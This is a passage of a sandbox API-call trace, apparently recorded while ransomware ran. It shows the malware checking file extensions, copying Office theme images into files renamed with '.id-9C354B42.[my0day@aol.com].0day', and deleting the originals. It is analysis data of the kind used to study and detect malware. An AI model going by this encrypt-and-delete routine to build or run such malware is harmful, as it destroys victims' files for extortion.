[0046.257] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.257] lstrlenW (lpString=".pdf") returned 4 [0046.257] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.257] lstrlenW (lpString=".xls") returned 4 [0046.257] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.257] lstrlenW (lpString=".xlsx") returned 5 [0046.258] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.258] lstrlenW (lpString=".ppt") returned 4 [0046.258] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.258] lstrlenW (lpString=".zip") returned 4 [0046.258] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.258] lstrlenW (lpString=".rar") returned 4 [0046.258] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.258] lstrlenW (lpString=".bz2") returned 4 [0046.258] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.258] lstrlenW (lpString=".7z") returned 3 [0046.258] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.258] lstrlenW (lpString=".dbf") returned 4 [0046.258] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.258] lstrlenW (lpString=".1cd") returned 4 [0046.258] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.258] lstrlenW (lpString=".jpg") returned 4 [0046.258] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.258] lstrlenW (lpString=".doc") returned 4 [0046.258] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.258] lstrlenW (lpString=".docx") returned 5 [0046.258] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.258] lstrlenW (lpString=".pdf") returned 4 [0046.258] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.258] lstrlenW (lpString=".xls") returned 4 [0046.258] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.258] lstrlenW (lpString=".xlsx") returned 5 [0046.258] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.259] lstrlenW (lpString=".ppt") returned 4 [0046.259] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.259] lstrlenW (lpString=".zip") returned 4 [0046.259] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.259] lstrlenW (lpString=".rar") returned 4 [0046.259] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.259] lstrlenW (lpString=".bz2") returned 4 [0046.259] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.259] lstrlenW (lpString=".7z") returned 3 [0046.259] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.259] lstrlenW (lpString=".dbf") returned 4 [0046.259] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.259] lstrlenW (lpString=".1cd") returned 4 [0046.259] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.259] lstrlenW (lpString=".jpg") returned 4 [0046.259] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.259] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.259] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0046.260] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1593) returned 1 [0046.260] CloseHandle (hObject=0x1d8) returned 1 [0046.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 0x20 [0046.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0046.260] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.260] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0046.262] GetLastError () returned 0x0 [0046.262] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x639, lpOverlapped=0x0) returned 1 [0046.263] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x640, lpOverlapped=0x0) returned 1 [0046.264] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0046.264] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.264] SetEndOfFile (hFile=0x188) returned 1 [0046.264] CloseHandle (hObject=0x188) returned 1 [0046.264] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.264] SetEndOfFile (hFile=0x1d8) returned 1 [0046.265] CloseHandle (hObject=0x1d8) returned 1 [0046.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.270] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 1 [0046.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.270] lstrlenW (lpString=".doc") returned 4 [0046.270] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.270] lstrlenW (lpString=".docx") returned 5 [0046.270] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.270] lstrlenW (lpString=".pdf") returned 4 [0046.270] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.270] lstrlenW (lpString=".xls") returned 4 [0046.270] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.270] lstrlenW (lpString=".xlsx") returned 5 [0046.270] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.270] lstrlenW (lpString=".ppt") returned 4 [0046.270] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.270] lstrlenW (lpString=".zip") returned 4 [0046.270] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.270] lstrlenW (lpString=".rar") returned 4 [0046.270] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.270] lstrlenW (lpString=".bz2") returned 4 [0046.270] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.270] lstrlenW (lpString=".7z") returned 3 [0046.270] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.270] lstrlenW (lpString=".dbf") returned 4 [0046.271] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.271] lstrlenW (lpString=".1cd") returned 4 [0046.271] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.271] lstrlenW (lpString=".jpg") returned 4 [0046.271] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.271] lstrlenW (lpString=".doc") returned 4 [0046.271] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.271] lstrlenW (lpString=".docx") returned 5 [0046.271] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.271] lstrlenW (lpString=".pdf") returned 4 [0046.271] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.271] lstrlenW (lpString=".xls") returned 4 [0046.271] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.271] lstrlenW (lpString=".xlsx") returned 5 [0046.271] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.271] lstrlenW (lpString=".ppt") returned 4 [0046.271] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.271] lstrlenW (lpString=".zip") returned 4 [0046.271] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.271] lstrlenW (lpString=".rar") returned 4 [0046.271] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.271] lstrlenW (lpString=".bz2") returned 4 [0046.271] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.271] lstrlenW (lpString=".7z") returned 3 [0046.271] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.271] lstrlenW (lpString=".dbf") returned 4 [0046.271] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.272] lstrlenW (lpString=".1cd") returned 4 [0046.272] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0046.272] lstrlenW (lpString=".jpg") returned 4 [0046.272] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.272] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0046.272] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.485] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=21745) returned 1 [0046.485] CloseHandle (hObject=0x174) returned 1 [0046.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 0x20 [0046.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.485] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.485] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.490] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.490] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.490] GetLastError () returned 0x0 [0046.490] ReadFile (in: hFile=0x174, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x54f1, lpOverlapped=0x0) returned 1 [0046.492] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x5500, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x5500, lpOverlapped=0x0) returned 1 [0046.494] ReadFile (in: hFile=0x174, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0046.494] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.494] SetEndOfFile (hFile=0x194) returned 1 [0046.494] CloseHandle (hObject=0x194) returned 1 [0046.494] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.494] SetEndOfFile (hFile=0x174) returned 1 [0046.495] CloseHandle (hObject=0x174) returned 1 [0046.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.495] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 1 [0046.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.495] lstrlenW (lpString=".doc") returned 4 [0046.495] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.496] lstrlenW (lpString=".docx") returned 5 [0046.496] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.496] lstrlenW (lpString=".pdf") returned 4 [0046.496] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.496] lstrlenW (lpString=".xls") returned 4 [0046.496] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.496] lstrlenW (lpString=".xlsx") returned 5 [0046.496] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.496] lstrlenW (lpString=".ppt") returned 4 [0046.496] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.496] lstrlenW (lpString=".zip") returned 4 [0046.496] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.496] lstrlenW (lpString=".rar") returned 4 [0046.496] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.496] lstrlenW (lpString=".bz2") returned 4 [0046.496] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.496] lstrlenW (lpString=".7z") returned 3 [0046.496] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.496] lstrlenW (lpString=".dbf") returned 4 [0046.496] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.496] lstrlenW (lpString=".1cd") returned 4 [0046.496] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.496] lstrlenW (lpString=".jpg") returned 4 [0046.496] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.496] lstrlenW (lpString=".doc") returned 4 [0046.496] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.497] lstrlenW (lpString=".docx") returned 5 [0046.497] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.497] lstrlenW (lpString=".pdf") returned 4 [0046.497] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.497] lstrlenW (lpString=".xls") returned 4 [0046.497] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.497] lstrlenW (lpString=".xlsx") returned 5 [0046.497] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.497] lstrlenW (lpString=".ppt") returned 4 [0046.497] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.497] lstrlenW (lpString=".zip") returned 4 [0046.497] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.497] lstrlenW (lpString=".rar") returned 4 [0046.497] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.497] lstrlenW (lpString=".bz2") returned 4 [0046.497] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.497] lstrlenW (lpString=".7z") returned 3 [0046.497] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.497] lstrlenW (lpString=".dbf") returned 4 [0046.497] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.497] lstrlenW (lpString=".1cd") returned 4 [0046.497] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0046.497] lstrlenW (lpString=".jpg") returned 4 [0046.497] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.497] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.498] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.498] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.498] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=2604) returned 1 [0046.498] CloseHandle (hObject=0x174) returned 1 [0046.498] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif")) returned 0x20 [0046.498] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.498] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.498] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.498] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.498] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.500] GetLastError () returned 0x0 [0046.500] ReadFile (in: hFile=0x174, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xa2c, lpOverlapped=0x0) returned 1 [0046.501] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xa30, lpOverlapped=0x0) returned 1 [0046.502] ReadFile (in: hFile=0x174, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0046.502] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.502] SetEndOfFile (hFile=0x194) returned 1 [0046.503] CloseHandle (hObject=0x194) returned 1 [0046.503] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.503] SetEndOfFile (hFile=0x174) returned 1 [0046.503] CloseHandle (hObject=0x174) returned 1 [0046.504] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.504] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif")) returned 1 [0046.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.504] lstrlenW (lpString=".doc") returned 4 [0046.504] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.504] lstrlenW (lpString=".docx") returned 5 [0046.504] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.504] lstrlenW (lpString=".pdf") returned 4 